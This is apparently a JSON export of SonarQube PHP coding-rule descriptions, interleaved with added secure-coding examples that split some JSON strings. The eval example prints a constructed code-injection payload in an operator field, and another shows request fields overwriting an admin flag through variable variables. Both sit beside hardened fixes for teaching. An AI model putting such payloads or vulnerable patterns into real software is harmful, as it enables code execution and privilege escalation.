If you have\n  carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it\n  without properly validating it beforehand.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval($code_to_be_dynamically_executed);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n  Evaluated Code ('Eval Injection') <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S1536","repo":"php","name":"Function argument names should be unique","htmlDesc":"<p>Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name. This hiding makes no sense, reduces understandability and maintainability, and obviously can be\nerror prone. <\/p>\n<p>Since PHP 7.0 a duplicated parameter name is a compile-time fatal error (\"Redefinition of parameter\"), so such code no longer runs at all.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute($a, $a, $c) { \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute($a, $b, $c) { \/\/ Compliant\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1599","repo":"php","name":"Variable variables should not be used","htmlDesc":"<p>PHP's \"variable variables\" feature (dynamically-named variables) is temptingly powerful, but can lead to unmaintainable code. 
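The S1523 description quotes the PHP manual's warning about passing user-provided data to `eval()` but shows only a one-line noncompliant call. The following added example (not part of the SonarSource rule text) puts the vulnerable pattern beside a hardened form: a calculator that splices a request-controlled operator into source text, versus one where the only dynamic choice is a key into a fixed table of callables. The parameter names, the `$payload` string and the `/tmp/owned` path are constructed for the illustration; the attacker string is displayed, not evaluated.

```php
<?php
declare(strict_types=1);

// Added example, not from the SonarSource rule text. Parameter names and the
// payload string are constructed for illustration.

// Noncompliant (S1523): request-controlled text becomes PHP source. Anything
// the client puts after a ';' runs with the web server's privileges.
function calculateUnsafe(string $a, string $op, string $b)
{
    $code = "return {$a} {$op} {$b};";
    return eval($code);
}

// Compliant: the operator selects from a closed table of callables, operands
// are checked to be numeric and cast, and nothing is ever interpreted as code.
function calculateSafe(string $a, string $op, string $b): float
{
    static $ops = null;
    $ops ??= [
        '+' => fn(float $x, float $y): float => $x + $y,
        '-' => fn(float $x, float $y): float => $x - $y,
        '*' => fn(float $x, float $y): float => $x * $y,
        '/' => function (float $x, float $y): float {
            if ($y == 0.0) {
                throw new DivisionByZeroError('division by zero');
            }
            return $x / $y;
        },
    ];
    if (!array_key_exists($op, $ops)) {
        throw new InvalidArgumentException('unsupported operator');
    }
    if (!is_numeric($a) || !is_numeric($b)) {
        throw new InvalidArgumentException('operands must be numeric');
    }
    return $ops[$op]((float) $a, (float) $b);
}

// Benign request: both variants agree on the arithmetic.
var_dump(calculateUnsafe('6', '*', '7'));
var_dump(calculateSafe('6', '*', '7'));

// Attacker-controlled operator (constructed payload). Shown, not executed:
// with calculateUnsafe() the evaluated source is a statement list, so the
// file_put_contents() call would run before the arithmetic even completes.
$payload = "+ 0; file_put_contents('/tmp/owned', 'pwned'); return 1 +";
echo "eval() would execute: return 6 {$payload} 7;\n";

try {
    calculateSafe('6', $payload, '7');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

The design point is that validation alone ("pay special attention not to pass any user provided data into it") is the weaker fix: the hardened version removes `eval()` entirely, so there is no string for a bypass to target, and unknown operators fail closed with an exception rather than being passed through.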
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$var = 'foo';\n$$var = 'bar';      \/\/Noncompliant\n$$$var = 'hello';  \/\/Noncompliant\n\necho $foo; \/\/will display 'bar'\necho $bar; \/\/will display 'hello'\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1600","repo":"php","name":"Deprecated predefined variables should not be used","htmlDesc":"<p>The following predefined variables are deprecated (and removed altogether in PHP 5.4) and should be replaced by the new versions:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Replace<\/th>\n      <th>With<\/th>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SERVER_VARS<\/td>\n      <td>$_SERVER<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_GET_VARS<\/td>\n      <td>$_GET<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_VARS<\/td>\n      <td>$_POST<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_POST_FILES<\/td>\n      <td>$_FILES<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_SESSION_VARS<\/td>\n      <td>$_SESSION<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_ENV_VARS<\/td>\n      <td>$_ENV<\/td>\n    <\/tr>\n    <tr>\n      <td>$HTTP_COOKIE_VARS<\/td>\n      <td>$_COOKIE<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho 'Name parameter value: ' . $HTTP_GET_VARS[\"name\"];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho 'Name parameter value: ' . $_GET[\"name\"];\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1603","repo":"php","name":"PHP 4 constructor declarations should not be used","htmlDesc":"<p>In PHP 4, any function with the same name as the nesting class was considered a class constructor. In PHP 5, this mechanism has been deprecated and\nthe \"__construct\" method name should be used instead. If both styles are present in the same class, PHP 5 will treat the function named \"__construct\"\nas the class constructor. 
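S1599 above frames variable variables as a maintainability problem; the added example below (not part of the SonarSource rule text) shows why a security reviewer flags them too. When the variable name comes from a request, the client chooses which local gets overwritten, which is the same primitive that made `register_globals` and `extract($_POST)` notorious. The request array and the `isAdmin` flag are constructed for the illustration; in a real handler the array would be `$_POST` or `$_GET`.

```php
<?php
declare(strict_types=1);

// Added example, not from the SonarSource rule text. The request array is
// constructed inline; in a real handler it would be $_POST or $_GET.

// Noncompliant (S1599): every request key becomes a local variable name, so
// the client can overwrite state the code set earlier, here $isAdmin.
function buildProfileUnsafe(array $request): array
{
    $isAdmin = false;
    $displayName = 'anonymous';
    foreach ($request as $key => $value) {
        $$key = $value;   // variable variable: the attacker picks the name
    }
    return ['displayName' => $displayName, 'isAdmin' => $isAdmin];
}

// Compliant: copy only the fields that are expected into explicitly named
// variables, validate each one, and never let request keys name locals.
function buildProfileSafe(array $request): array
{
    $isAdmin = false;
    $displayName = 'anonymous';
    if (isset($request['displayName']) && is_string($request['displayName'])) {
        $displayName = substr($request['displayName'], 0, 64);
    }
    return ['displayName' => $displayName, 'isAdmin' => $isAdmin];
}

// Constructed malicious request: an extra field named after the privilege flag.
$request = ['displayName' => 'mallory', 'isAdmin' => true];

var_dump(buildProfileUnsafe($request)['isAdmin']);
var_dump(buildProfileSafe($request)['isAdmin']);
```

Running it shows the unsafe builder returning an elevated `isAdmin` for the constructed request while the safe one keeps the value the code assigned. `extract()` with its default `EXTR_OVERWRITE` flag has exactly the same effect as the `$$key` loop and deserves the same review treatment.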
PHP 7.0 deprecates PHP 4-style constructors and PHP 8.0 removes them entirely.<\/p>\n<p>This rule raises an issue for each method with the same name as the enclosing class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  function Foo(){...}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n  function __construct(){...}\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1605","repo":"php","name":"\"__construct\" functions should not make PHP 4-style calls to parent constructors","htmlDesc":"<p>In PHP 5 both the way to declare a constructor and the way to make a call to a parent constructor have evolved. When declaring constructors with\nthe PHP5 <code>__construct<\/code> name, nested calls to parent constructors should also use the new <code>__construct<\/code> name.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::Bar();\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo extends Bar {\n  function __construct() {\n    parent::__construct();\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1656","repo":"php","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. 
Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic function setName($name) {\n    $name = $name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function setName($name) {\n    $this-&gt;name = $name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1757","repo":"php","name":"\"<?php\" and \"<?=\" tags should be used","htmlDesc":"<p>Coding conventions allow teams to collaborate effectively. For maximum standardization and readability, PHP code should use the long <code>&lt;?php\n?&gt;<\/code> tags or the short-echo <code>&lt;?= ?&gt;<\/code> tags; it should not use the other tag variations.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?\n$foo = 1;\n?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n$foo = 1;\n?&gt;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1763","repo":"php","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>goto<\/code>) and <code>throw<\/code> expressions move\ncontrol flow out of the current code block. Typically, any statements in a block that come after a jump or <code>throw<\/code> are simply wasted\nkeystrokes lying in wait to confuse the unwary. <\/p>\n<p>Rarely, as illustrated below, code after a jump or <code>throw<\/code> is reachable. 
However, such code is difficult to understand, and should be\nrefactored. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n  $i++;             \/\/ this is never executed\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    goto error;\n  } else {\n    \/\/ do the job\n  }\n  return;\n\n  error:\n    printf(\"don't use 5\"); \/\/ this is reachable but unreadable\n\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction fun($a) {\n  $i = 10;\n  return $i + $a;\n}\n\nfunction foo($a) {\n  if ($a == 5) {\n    handleError();\n  } else {\n    \/\/ do the job\n  }\n  return;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n  <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n  doZ();\n}\nif ( $a != $a ) { \/\/ always false\n  doY();\n}\nif ( $a == $b &amp;&amp; $a == $b ) { \/\/ if the first one is true, the second one is too\n  doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n  doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 &lt;&lt; 1; \/\/ Compliant\n$j = $a &lt;&lt; $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. 
Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n  <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n  In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar1 = 1;\n   private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. 
Moreover,\nsome SCM engines, such as Git, may handle Windows 'CRLF' line endings poorly.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The closing <code>?&gt;<\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n  <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n  be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n  the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Mixing lower and upper case for PHP keywords and the constants \"true\", \"false\" and \"null\" impairs the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php ECHO 'Hello World'; ?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php echo 'Hello World'; ?&gt;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. 
To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...}  \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\");  \/\/ Runtime error: missing argument 2 ($flavor) in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\"){...}\n\nmakeyogurt(\"raspberry\"); \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} else if ($expr2) {\n  ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} elseif ($expr2) 
{\n  ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should never be used in web PHP pages: they abort the request mid-way, and the end\nuser is left with the impression that the web site is down or has encountered a fatal error. <\/p>\n<p>PHP is also used to develop command line applications, and there a call to <code>exit(...)<\/code> or <code>die(...)<\/code>\ncan be justified, but it must remain limited rather than spread all over the application. Errors should be handled with exceptions, and those\nexceptions should be caught just before leaving the application, where the exit code is set with a single <code>exit(...)<\/code> or <code>die(...)<\/code>\ncall.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            exit(23);\n        }\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            throw new Exception('Value 42 is not expected.');\n        }\n    }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with the formatting\nstandard. 
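Worked example for the exit()/die() rule (php:S1799) above, added here by the editor and not part of the SonarQube rule description: the business code throws, and one CLI entry point translates the exception into the process exit code, which is what the rule text asks for. The names Processor, InvalidInputException and run_cli, and the exit-code values 1 and 2, are assumptions for this example.

```php
<?php
declare(strict_types=1);

// Added example for rule php:S1799 (exit/die), not code from the rule
// description. Processor, InvalidInputException, run_cli and the exit-code
// values are assumptions for the example.

final class InvalidInputException extends \RuntimeException
{
}

final class Processor
{
    // Noncompliant shape from the rule: if ($param === 42) { exit(23); }
    // exit() ends the whole process (web request or CLI run), skips the
    // caller's finally blocks and leaves nothing for a test to observe.
    // Throwing keeps the decision with the caller.
    public function bar(int $param): int
    {
        if ($param === 42) {
            throw new InvalidInputException('Value 42 is not expected.');
        }
        return $param * 2;
    }
}

/**
 * The one place that decides the process exit code. It returns the code
 * rather than calling exit() so it can be unit-tested; the single real
 * exit() sits in the guarded block at the bottom of the file.
 */
function run_cli(array $argv): int
{
    $err = fopen('php://stderr', 'w');
    try {
        $value  = isset($argv[1]) ? (int) $argv[1] : 0;
        $result = (new Processor())->bar($value);
        echo "result: {$result}\n";
        return 0;
    } catch (InvalidInputException $e) {
        fwrite($err, 'usage error: ' . $e->getMessage() . "\n");
        return 2;                               // assumed code for bad input
    } catch (\Throwable $e) {
        // Anything unexpected: report class and message, exit non-zero.
        fwrite($err, get_class($e) . ': ' . $e->getMessage() . "\n");
        return 1;
    } finally {
        fclose($err);                           // runs on the throw path too, which exit() would skip
    }
}

// Only a direct CLI run of this file may terminate the process; a web request
// that includes this file must never be killed by exit().
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    exit(run_cli($argv));
}
```

Running `php script.php 41` prints the result and exits 0; `php script.php 42` writes the usage error to stderr and exits 2. Because run_cli() returns the code instead of calling exit() itself, a test can call it directly and assert on the return value.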
The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002   {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if($thirdThing) {      \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    }\n    else {                 \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n      ...\n    }\n\n    try{                   \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the 
curly brace\n      ...\n    } catch (Exception $e) {\n\u2002\u2002  }\n\n    analyse( $fruit ) ;    \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n    for ($i = 0;$i &lt; 10;   $i++) { \/\/ Noncompliant; there should be exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    pressJuice($apply ,$orange);    \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n    do_something ();       \/\/ Noncompliant; there should not be any space after the method name\n\n    foreach ($fruits    as $fruit_key =&gt;     $fruit) {  \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\nclass ClassB\nextends ParentClass  \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n  ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n    \\Serializable    \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n  public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n    &amp;$arg2, array $arg3 = []) {\n\n    $noArgs_longVars = function () use ($longVar1,         \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n        $longerVar2,\n        $muchLongerVar3\n    ) {\n      ...\n    };\n\n    $foo-&gt;bar($longArgument,    \/\/ Noncompliant; the arguments in a method call should be correctly indented\n      $longerArgument,\n      $muchLongerArgument);     \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n    $closureWithArgsAndVars = function($arg1, $arg2)use   ($var1, $var2) {  \/\/ Noncompliant; the closure declaration should be correctly spaced\n      ...\n    };\n  
}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass;             \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n                          \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002           \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n  {\u2002\u2002\u2002\u2002                   \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if ($thirdThing) {    \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    } else {              \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n      ...\n    }\n\n    try {                 \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n      ...\n    } catch (Exception $e) {\n      ...\n    }\n\n    analyse($fruit);      \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n    for ($i = 0; $i &lt; 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    
pressJuice($apply, $orange);   \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n    do_something();       \/\/ Compliant; there is no space after the method name\n\n    foreach ($fruits as $fruit_key =&gt; $fruit) {  \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n  ...\n}\n\nclass ClassB2 extends             \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n  ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n    \\ArrayAccess,         \/\/ Compliant; the list of implemented interfaces is correctly indented\n    \\Countable,\n    \\Serializable\n{\n  \/* Argument lists may be split across multiple lines, where each subsequent line\n   * is indented once. When doing so, the first item in the list should be on the next line,\n   * and there should be only one argument per line. 
Also, when the argument list is\n   * split across multiple lines, the closing parenthesis and opening brace should be\n   * placed together on their own line with one space between them.\n   *\/\n  public function aVeryLongMethodName(\n    ClassTypeHint $arg1,  \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n      &amp;$arg2,\n      array $arg3 = []\n    ) {\n      $noArgs_longVars = function () use (\n        $longVar1,        \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n        $longerVar2,\n        $muchLongerVar3\n      ) {\n        ...\n      };\n\n\n    \/* Argument lists may be split across multiple lines, where each subsequent line is\n     * indented once. When doing so, the first item in the list should be on the next line,\n     * and there should be only one argument per line.\n     *\/\n    $foo-&gt;bar(\n      $longArgument,       \/\/ Compliant; the arguments in the method call are correctly indented\n      $longerArgument,\n      $muchLongerArgument\n    );                     \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n    \/* Closures should be declared with a space after the \"function\" keyword,\n     * and a space before and after the \"use\" keyword.\n     *\/\n    $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n      ...\n    };\n  